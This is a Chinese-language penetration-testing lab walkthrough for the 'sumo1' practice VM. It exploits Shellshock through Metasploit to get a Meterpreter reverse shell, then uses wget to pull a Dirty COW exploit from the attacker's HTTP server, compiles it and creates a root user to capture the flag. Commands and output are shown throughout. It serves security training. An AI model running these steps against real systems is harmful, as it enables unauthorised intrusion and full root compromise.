渗透测试练习记录之sumo1靶机

环境搭建见

https://blog.csdn.net/qq_33163046/article/details/106544200

 

攻击机：

10.42.43.56（192.168.56.111）

 

1.用arp-scan搜索确定靶机IP

 

root@kali:~# arp-scan -l

Interface: eth0, type: EN10MB, MAC: 08:00:27:6e:5b:79, IPv4: 192.168.56.111

Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)

192.168.56.1    0a:00:27:00:00:08       (Unknown: locally administered)

192.168.56.100  08:00:27:29:1c:17       PCS Systemtechnik GmbH

192.168.56.100  08:00:27:8b:4b:fa       PCS Systemtechnik GmbH (DUP: 2)

192.168.56.100  08:00:27:40:ba:b0       PCS Systemtechnik GmbH (DUP: 3)

192.168.56.105  08:00:27:92:a6:6c       PCS Systemtechnik GmbH

192.168.56.109  08:00:27:04:dd:ae       PCS Systemtechnik GmbH

192.168.56.138  08:00:27:53:4b:7d       PCS Systemtechnik GmbH

 

7 packets received by filter, 0 packets dropped by kernel

Ending arp-scan 1.9.7: 256 hosts scanned in 1.958 seconds (130.75 hosts/sec). 7 responded

 

2.用nikto扫描网站漏洞

root@kali:~# nikto -h http://192.168.56.138

- Nikto v2.1.6

---------------------------------------------------------------------------

+ Target IP:          192.168.56.138

+ Target Hostname:    192.168.56.138

+ Target Port:        80

+ Start Time:         2020-06-08 23:24:05 (GMT-4)

---------------------------------------------------------------------------

+ Server: Apache/2.2.22 (Ubuntu)

+ Server may leak inodes via ETags, header found with file /, inode: 1706318, size: 177, mtime: Mon May 11 13:55:10 2020

+ The anti-clickjacking X-Frame-Options header is not present.

+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS

+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type

+ Uncommon header 'tcn' found, with contents: list

+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html

+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.

+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS

+ Uncommon header '93e4r0-cve-2014-6278' found, with contents: true

+ OSVDB-112004: /cgi-bin/test: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271).

+ OSVDB-112004: /cgi-bin/test.sh: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271).

+ OSVDB-3092: /cgi-bin/test/test.cgi: This might be interesting...

+ OSVDB-3233: /icons/README: Apache default file found.

+ 8725 requests: 0 error(s) and 13 item(s) reported on remote host

+ End Time:           2020-06-08 23:24:23 (GMT-4) (18 seconds)

---------------------------------------------------------------------------

+ 1 host(s) tested

 

3.用MSF查找此漏洞的攻击模块并使用

msf5 > search 2014-6271

 

Matching Modules

================

 

   #  Name                                               Disclosure Date  Rank       Check  Description

   -  ----                                               ---------------  ----       -----  -----------

   0  auxiliary/scanner/http/apache_mod_cgi_bash_env     2014-09-24       normal     Yes    Apache mod_cgi Bash Environment Variable Injection (Shellshock) Scanner

   1  auxiliary/server/dhclient_bash_env                 2014-09-24       normal     No     DHCP Client Bash Environment Variable Code Injection (Shellshock)

   2  exploit/linux/http/advantech_switch_bash_env_exec  2015-12-01       excellent  Yes    Advantech Switch Bash Environment Variable Code Injection (Shellshock)

   3  exploit/linux/http/ipfire_bashbug_exec             2014-09-29       excellent  Yes    IPFire Bash Environment Variable Injection (Shellshock)

   4  exploit/multi/ftp/pureftpd_bash_env_exec           2014-09-24       excellent  Yes    Pure-FTPd External Authentication Bash Environment Variable Code Injection (Shellshock)

   5  exploit/multi/http/apache_mod_cgi_bash_env_exec    2014-09-24       excellent  Yes    Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)

   6  exploit/multi/http/cups_bash_env_exec              2014-09-24       excellent  Yes    CUPS Filter Bash Environment Variable Code Injection (Shellshock)

   7  exploit/osx/local/vmware_bash_function_root        2014-09-24       normal     Yes    OS X VMWare Fusion Privilege Escalation via Bash Environment Code Injection (Shellshock)

   8  exploit/unix/dhcp/bash_environment                 2014-09-24       excellent  No     Dhclient Bash Environment Variable Injection (Shellshock)

   9  exploit/unix/smtp/qmail_bash_env_exec              2014-09-24       normal     No     Qmail SMTP Bash Environment Variable Injection (Shellshock)

 

msf5 > use exploit/multi/http/apache_mod_cgi_bash_env_exec

msf5 exploit(multi/http/apache_mod_cgi_bash_env_exec) >

 

msf5 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set RHOSTS 192.168.56.138

RHOSTS => 192.168.56.138

 

msf5 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set TARGETURI /cgi-bin/test

TARGETURI => /cgi-bin/test

msf5 exploit(multi/http/apache_mod_cgi_bash_env_exec) > exploit                 

[*] Started reverse TCP handler on 192.168.56.111:4444

[*] Command Stager progress - 100.46% done (1097/1092 bytes)

[*] Sending stage (985320 bytes) to 192.168.56.138

[*] Meterpreter session 1 opened (192.168.56.111:4444 -> 192.168.56.138:56657) at 2020-06-08 23:34:53 -0400

 

meterpreter > shell

Process 885 created.

Channel 1 created.

python -c 'import pty; pty.spawn("/bin/bash")'

www-data@ubuntu:/usr/lib/cgi-bin$

 

4.下载脏牛漏洞利用代码放到KALI上

找到是否存在脏牛漏洞脚本scan-dirtycow.sh和exp:dirty.c

https://github.com/aishee/scan-dirtycow/blob/master/dirtycowscan.sh

https://www.exploit-db.com/raw/40839

root@kali:/sumo# ls -l

total 44

-rwxr-xr-x 1 root root  5006 Jun  8 23:45 dirty.c

-rwxr-xr-x 1 root root 36036 Jun  8 23:45 dirtycowscan.sh

 

5.KALI本地开启http 服务，为文件传输做准备

root@kali:/sumo# python -m SimpleHTTPServer

Serving HTTP on 0.0.0.0 port 8000 ...

 

 

 

6.传输并执行dirtycowscan.sh

www-data@ubuntu:/tmp$ ls

ls

CVhNb  SUmli

www-data@ubuntu:/tmp$ wget http://192.168.56.111:8000/dirtycowscan.sh

wget http://192.168.56.111:8000/dirtycowscan.sh

--2020-06-16 00:53:11--  http://192.168.56.111:8000/dirtycowscan.sh

Connecting to 192.168.56.111:8000... connected.

HTTP request sent, awaiting response... 200 OK

Length: 36036 (35K) [text/x-sh]

Saving to: `dirtycowscan.sh'

 

100%[======================================>] 36,036      --.-K/s   in 0s

 

2020-06-16 00:53:11 (275 MB/s) - `dirtycowscan.sh' saved [36036/36036]

 

www-data@ubuntu:/tmp$ ls

ls

CVhNb  SUmli  dirtycowscan.sh

www-data@ubuntu:/tmp$ chmod 777 dirtycowscan.sh

chmod 777 dirtycowscan.sh

www-data@ubuntu:/tmp$ ls -l

ls -l

total 44

-rwxrwxrwx 1 www-data www-data   207 Jun 16 00:49 CVhNb

-rwxrwxrwx 1 www-data www-data   207 Jun 16 00:34 SUmli

-rwxrwxrwx 1 www-data www-data 36036 Jun  8 21:57 dirtycowscan.sh

www-data@ubuntu:/tmp$ ./dirtycowscan.sh

./dirtycowscan.sh

Your kernel is 3.2.0-23-generic which IS vulnerable.

It is recommends that you update your kernel. Alternatively, you can apply partial

mitigation described at https://access.redhat.com/security/vulnerabilities/2706661 .

 

7.传输并执行dirty.c

www-data@ubuntu:/tmp$ wget http://192.168.56.111:8000/dirty.c

wget http://192.168.56.111:8000/dirty.c

--2020-06-16 01:01:44--  http://192.168.56.111:8000/dirty.c

Connecting to 192.168.56.111:8000... connected.

HTTP request sent, awaiting response... 200 OK

Length: 4814 (4.7K) [text/plain]

Saving to: `dirty.c'

 

100%[======================================>] 4,814       --.-K/s   in 0.02s

 

2020-06-16 01:01:44 (231 KB/s) - `dirty.c' saved [4814/4814]

 

 

www-data@ubuntu:/tmp$ chmod 777 dirty.c

chmod 777 dirty.c

www-data@ubuntu:/tmp$ gcc -pthread dirty.c -o dirty -lcrypt

 

gcc -pthread dirty.c -o dirty -lcrypt

 

www-data@ubuntu:/tmp$

 

./dirty testpasswd

/etc/passwd successfully backed up to /tmp/passwd.bak

Please enter the new password: testpasswd

Complete line:

firefart:fieLQox9gttqw:0:0:pwned:/root:/bin/bash

 

mmap: 7f1d3b876000

madvise 0

 

ptrace 0

Done! Check /etc/passwd to see if the new user was created.

You can log in with the username 'firefart' and the password 'testpasswd'.

 

 

DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd

Done! Check /etc/passwd to see if the new user was created.

You can log in with the username 'firefart' and the password 'testpasswd'.

 

 

DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd

 

8.登陆创建的用户并找到FLAG

www-data@ubuntu:/tmp$ su firefart

su  firefart

Password: testpasswd

 

firefart@ubuntu:/tmp#

 

firefart@ubuntu:/tmp# cd /root

cd /root

firefart@ubuntu:~# cat root.txt

cat root.txt

{Sum0-SunCSR-2020_r001}